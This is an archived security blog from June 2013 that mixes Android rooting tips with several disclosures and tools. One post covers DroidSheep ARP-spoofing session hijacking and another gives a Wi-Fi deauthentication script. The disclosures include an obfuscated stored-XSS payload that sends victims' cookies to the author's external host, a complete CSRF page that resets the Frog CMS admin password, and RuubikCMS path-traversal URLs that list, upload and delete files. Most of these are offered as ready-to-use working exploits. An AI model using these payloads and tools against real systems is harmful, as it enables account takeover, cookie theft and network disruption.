Sunday 30 June 2013

Droidsheep Session Hijacking



Droidsheep is very good tool which spoofs ARP requests and will hijack victim sessions, It will hijack HTTP traffic and not HTTPS

1. You must root your phone first
2. Download Droidsheep 14 from here or older version from here
3. Install apk on your rooted android


Step1

  1. Login to http://www.4shared.com/developer/docs/account/
  2. Start DroidSheep
  3. Select Generic mode
  4. Start ARP Spoofing
DroidSheep in Action
Session Hijacked






























Thanks for visiting blackpentesters.blogspot.com

Simple shell script to backup installed apk files


If you have installed necessary commands like VI editor on your android linux, you can go ahead with shell scripting. Here I have created simple linux script to backup all installed applications .apk files on to sdcard.

First of all whatever applications I installed through google play, I found them at  "/data/apps"

All installed .apk goes to /data/app
















So I have written simple shell script as below to backup those apk to sdcard, nothinig Great very simple commands!!

Notice #!/system/bin/sh as .. our "sh" is located at /system/bin/

Code:


#!/system/bin/sh

cd /data/app
mkdir /sdcard/apkbackup
cp *.apk /sdcard/apkbackup


After creating script as usual you can give permissions to script file : chmod 777 backupapk.sh


now execute script as : sh backupapk.sh 

Thats it all your installed apk will be backed up on storage card!!

All .apk files are copied to specified location

























This is just introduction to shell scripting on android linux, will post more scripts and interesting things as i explorer.

Android busybox and linux commands


After rooting my HTC ONE V, I was exploring android linux and found that most of day to day linux commands are not available.
For android linux commands visit :
https://github.com/jackpal/Android-Terminal-Emulator/wiki/Android-Shell-Command-Reference


Binary files which we require are present inside : "/system/bin" but found that most common commands like
uname, vim like editors powerful command like grep nothing was available and as a coder and a pen-tester we definitely need it, and found a good tool called "BusyBox" freely available on google play


Busy Box Installation

























Once you install busybox all required commands will be installed at "/system/bin" directory on your android phone.

After Busy Box Installation
















So with gr8 set of commands you can explorer your android phone, create your scripts etc.

Saturday 29 June 2013

Android wifi passwords storage location


Android Wifi passwords stored at location : "/data/misc/wifi"

Filename : wpa_supplicant.conf



















You can refer : http://linux.die.net/man/5/wpa_supplicant.conf for more information.

Still exploring the things on android, will post more soon!!!!





How To Root HTC One V


First of all, there are many links available on google for rooting HTC ONE V, I would like to share my experience about rooting this android phone purchased in India, with Android Ice Cream Sandwish.

Since many days I wanted to root my nice HTC ONE V and finally today its done!...I know its not a rocket science still a Joy of rooting!!!..As like everyone I searched many videos and articles on XDA and found one of the best article on XDA forums here  and xda member "CafeKampuchia"...Thanks really!!

  1. Backup your Important data, Contacts, which resides on your phone memory.
  2. Go to https://www.htcdev.com/register and register your account
  3. Go to http://www.htcdev.com/bootloader/unlock-instructions and follow instructions.

We need 5 Important files :
  1. adb.exe
  2. AdbWinApi.dll
  3. fastboot.exe
  4. recovery-clockwork-5.8.4.5-primou.img
  5. UPDATE-SuperSU-v1.34.zip
 I have uploaded all necessary files here

Core Steps for rooting :
1. Unlock bootloader
2. Flash Recovery
3. Root Phone

Unlock Bootloader :

Very Important Step is to enable USB Debugging before proceeding for rooting


USB Debugging enabled



























Next step is to boot your phone into HBOOT by holding down volume and let off the power button.
It will look like :


























Select "FASTBOOT" and press power button to select


















Now connect your USB cable to laptop and if drivers are present everything will work properly, in case below steps fail, you can download tool HTC Quick Root and click on Install HTC Drivers.



Now Fireup command prompt, navigate to our downloaded files and execute :

Command : fastboot.exe oem get_identifier_token















Now you should see token generated as in above screenshot which you will have to submit at HTC, and they will send a quick mail which contains attached file "Unlock_code.bin".
Copy above file to our folder and execute below command to unlock bootloader.












Congrates!!..you have successfully unlocked bootloader!





















Select Yes!!!! and your bootloader is unlocked!!. & it looks similar to below screenshot



























Flash Recovery:

For this we will be using "recovery-clockwork-5.8.4.5-primou.img" file.

1. Make sure USB debugging mode is enabled
2. Reboot phone and get into bootloader menu
3. Select "FASTBOOT"
4. Fire up command prompt and execute Flash recovery command :
    fastboot.exe flash recovery recovery-clockwork-5.8.4.5-primou.img5. 







5. Select "Recovery" mode from bootloader menu, and you will see below options.






















6. I preferred to Backup all my image and important system files at this moment before doing anything by selecting "backup and storage" options which is self explanatory.




















Root Phone :

After finishing your System Backup, you can proceed with rooting your HTC ONE V with the help of file "UPDATE-SuperSU-v1.34.zip"

1. Copy above zip file anywhere in yous SD Card
2. Startup bootloader (Power+Down Volume Rocker)
3. Select "RECOVERY" mode and then click on "Install Zip from SD Card"
4. Select your Zip file and it will take care of rooting your phone


















And Thats it, now phone rooted!!!..Enjoy benefits, Just to confirm you can download any apps which require root access and test it!..let me know your feedback and queries if any.





















Wednesday 19 June 2013

Ultimate WordPress Auction Plugin 1.0 - CSRF Vulnerability


Most of CMS seems vulnerable to CSRF attacks these days, Ultimate Wordpress auction plugin is really good concept, but suffering from CSRF vulnerability which when exploited, attacker may add Fake Auction Bids which obviously we don't want!!!!

Vulnerable URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction

Basically If you study source code closely there is no URL specified in FORM tag.

No URL Available!!


















So in such cases page is submitting FORM information to itself!!! So tried to craft CSRF exploit with same URL and worked well...


While CSRF Exploit Loading.....
















Fake Auction Added by Attacker


















I hope author will patch this soon, Aim is to make awareness about web exploitation and how it is done in practical environment, so that Application developer will be more careful while coding.

Wednesday 12 June 2013

Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities


Wordpress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
Interesting thing is Stored XSS + CSRF combination, because of which, attacker can exploit CSRF vulnerability to Trigger Stored XSS, for stealing Cookies!!!!

So what I have done here is , crafted simple CSRF exploit page with Stored XSS payload as below :

Challenges:

1. Stored XSS was there but was not able to execute functions like document.cookie, alert() etc.
2. Storing XSS payload inside our CSRF exploit html page.

To bypass 1st challenge I had to use function "String.fromCharCode(ascii value)" and payload will look like :

"><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script> 

Above payload will redirect victim to my website by attaching cookies in URL!!...

But when we put this payload inside value="XSS PAYLOAD" it will not work because it will be interpreted as value = ""><script>........ which actually sets your value="" instead of XSS payload to bypass this we can put &quot; instead of " ... and this will be considered as valid XSS payload inside your CSRF exploit form.

For exploit please check : exploit-db

Stored XSS Details :


URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms

Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
4. captcha_characters



Vulnerability POC:



Cookies are redirected to Attackers Website
















This is how Stored XSS can be exploited through CSRF which is effective attack, this is just for information purpose.

Published on Exploit-db
EDB-ID:26124



concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities


Found that, concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities

In this vulnerability attacker can craft CSRF Exploit page and host somewhere, and this link will be sent to Victim who is already logged in to Concrete5 CMS, once victim click on this link Attacker can,



  1. Modify SMTP Settings
  2. Modify Mail Importers Settings
  3. Delete Form Results



Exploit code has been published on exploit-db , Interesting thing is we can delete form results, but for that Attacker must be able to get hold of  "qsID" Parameter which can be found at below URL :



http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/ 


Once attacker gets "qSID" values, its game of minute to create CSRF page.































Delete Form :

Below is "qSID" value which is static throughout CMS, now you can craft this link in HTML page and send it to Victim, and Form results will be deleted!!!! This is just for informational purpose and not for destructive, but a POC of how attacker can maliciously think!!! 

















Exploit has been release publicly at exploit-db 
EDB-ID: 26077

Tuesday 11 June 2013

RuubikCMS 1.1.1 - Stored XSS Vulnerability


RuubikCMS 1.1.1 suffers from Stored XSS vulnerability too, when parsing user input to the 'name' parameter via POST method through '/ruubikcms/ruubikcms/cms/index.php'.
Attackers can exploit these weaknesses to execute arbitrary HTML and script code
in a user's browser session.

I have tested it on Chrome , Internet Explorer and Firefox browsers and it works Well !!



Stored XSS Vulnerable URL's

http://127.0.0.1/ruubikcms/ruubikcms/cms/index.php                      
[vulnerable : name]

http://127.0.0.1/ruubikcms/ruubikcms/cms/extranet.php?p=member-area
[vulnerable : name]

http://127.0.0.1/ruubikcms/ruubikcms/cms/sitesetup.php              
[Vulnerable : name , siteroot]

http://127.0.0.1/ruubikcms/ruubikcms/cms/users.php?role=5&p=test      
[Vulnerable : firstname , lastname]

Simple Payload:
p@yl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script>


Vulnerability POC's:





























Not much to explain as its very simple vulnerability...!!

EDB-ID: 25996




Wifi Disconnect Unwanted Client Shell Script (WifiKickOff.sh)


Just was working on something, which triggered me to create one script that will de-authenticated unnecessary clients connected to network!!!...I know you might be thinking we can block it though Wifi console, but think if attacker want to do the same!!!!!....

So came up with one simple shell script, I know its not fully customized but that I will leave upto you..


  1. This script makes use of "aireplay-ng" and "airodump-ng" tools freely available with backtrack
  2. It is required to specify MAC addresses of PC's or Laptops which you don't want to disconnect as it works on White Listing approach!!
  3. It is also required to specify MAC address of your Wifi Router.
That's it!...now this simple script will Get list of connected clients and will only disconnect those who are not present in Specified MAC Address, Seems confusing??? 

If MAC != Specified List of MAC Then --> Disconnect that Dude!!

I also tested this script and works well, you can even check and let me know if any performance issues on your network, or anything needs to be modified, I will be happy to work on it.


WifiKickOff Script:

#!/bin/bash

girish="XX:XX:XX:XX:XX:XX"
expl0i13r="XX:XX:XX:XX:XX:XX"

while true;do
i=1
cat final-01.csv | cut -d "," -f1 | tail -100 | sed '/Station MAC/d' | sed '/BSSID/d' | sed '/WIFI ROUTER MAC/d' | sed '/^$/d' | grep ":" | while read line
do

echo "Line is : $line"
if [ "$line" = "$expl0i13r" -o "$line" = "$girish" ];then
        echo "Security Researchers : $line"
else

echo $array[ $i ]
aireplay-ng -0 1 -a "WIFI ROUTER MAC" -c "$line" mon0 &

fi
sleep 1
(( i++ ))
done
done

For newbies try to figure out whats been done in above script!!! it will be helpful...

One more imp point!!, we are going to dump output using below command, which generates Final csv file containing below data.


1. airodump-ng -c 6 --bssid 00:24:B2:86:B3:52 mon0 -w final

2. Final-01.csv created!!!!!!!

root@bt:~/wifi# cat final-01.csv

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:24:B2:86:B3:52, 2013-06-11 12:53:27, 2013-06-11 14:12:06,  6,  54, WPA2, CCMP,PSK, -49,    37158,  1633037,   0.  0.  0.  0,   5, M-Two,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
XX:XX:XX:XX:XX, 2013-06-11 12:53:28, 2013-06-11 14:02:31,   0,     4478, WIFI MAC HERE
XX:XX:XX:XX:XX, 2013-06-11 13:23:40, 2013-06-11 14:02:32,   0,      185,  WIFI MAC HERE
XX:XX:XX:XX:XX, 2013-06-11 13:12:28, 2013-06-11 14:02:33,   0,      801,  WIFI MAC HERE


You can Download
Do Post Your Comments!


Monday 10 June 2013

Frog CMS 0.9.5 Stored XSS and CSRF Vulnerabilities



This vulnerability was already reported, long back but is not still patched, here are details about vulnerability
Please note that this was already reported but I later on came to know about it so thought to disclose it just for information purpose.

Found below URL's affected by XSS :

  1. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      snippet[name]
  2. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      user[name]
  3. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      page[slug], page[keywords]
  4. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      snippet[name]
P@yl0ads Used for Testing:
  1. "><script>alert('h@ck3d by eXpl0i13r')</script>
  2. "><script>alert(document.cookie +'\n'+document.domain)</script>
Stored XSS Payload










Stored XSS, Cookie Disclosed















Also this CMS is vulnerable to CSRF Attack, which can be exploited to change admin password

Code:

<html>
<head>
<script type="text/javascript" language="javascript">
 function submitform()
 {
  document.getElementById('myForm').submit();
 }
function selectchk()
 {
  var tab = document.getElementById("autocheck")
  var chk = tab.getElementsByTagName("input");
  var num = chk.length;
  
for (var i = 0; i < num; i++)
  {  
    status = chk[i].getAttribute("type");
    if ( status == "checkbox") {    
      chk[i].checked = true;     
   }
  }
}
</script>
</head>
<body>
<br>
<h1> CSRF Attack by eXpl0i13r </h1>
<br>
<form name="myForm" action="http://127.0.0.1/frog_095/frog_095/admin/?/user/edit/1" method="post">
<input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="admin">
<input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="">
<input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin">
<input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="eXpl0i13r"></td>
<input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="eXpl0i13r">
<div id="autocheck">
<input id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1">&nbsp;<label for="user_permission-administrator">Administrator</label>
<input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2">&nbsp;<label for="user_permission-developer">Developer</label>
<input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3">&nbsp;<label for="user_permission-editor">Editor</label>
</div>
</form>
<script type="text/javascript" language="javascript">
selectchk()
document.myForm.submit()
</script>
</body>
</html>

Attacker can craft such pages and provide links to Victim, which loads javascript to submit form and in turn changes admin password.



Thursday 6 June 2013

RuubikCMS 1.1.1 (tinybrowser.php, folder param) - Path Traversal Vulnerability


I found very simple Path traversal Vulnerability for RuubikCMS 1.1.1 , which can be exploited to list available files and folders from operating system,  I tested it on windows operating system.



Vulnerable Links :

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php?
type=file&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder=&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=file&folder=&feid=filenameid


tinybrowser.php :

/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=../../../../&feid=filenameid

File and Directory names listing








  • By exploiting vulnerability in this page, we can list files and directories present on server, but observed that .php files are not being shown.

Folder created in Xampp directory












  • We can create folders by using above url, wherever we want!!!



upload.php

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?type=file&feid=filenameid&folder=..%2F..%2F..%2F..%2F&badfiles=0&goodfiles=1&dupfiles=0

File uploaded in Xampp root directory



  • Using directory traversal exploit, we can upload files in specific directory, first we need to hit above URL which sets path internally to "c:\xampp" in my case, and now when you select file to upload and click on upload button, your file will be uploaded to "xampp" directory.
  • We could go ahead and upload PHP shell , but in this case when we try to do so, it throws permission error, but we can definitely upload ".html" wherever we want.


edit.php

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder=..%2F..%2F..%2F..%2F&feid=filenameid

Deleted Files from Xampp Directory (hack.txt)















  • Exploiting same vulnerability in edit.php page we can delete files by selecting directory using above exploit and then delete files listed.
  • Observed that files from important directories like "php" was not deleted using this procedure

Exploit has been published on :

http://www.exploit-db.com/exploits/25973/      [ EDB-ID: 25973 ] 
http://1337day.com/exploit/description/20859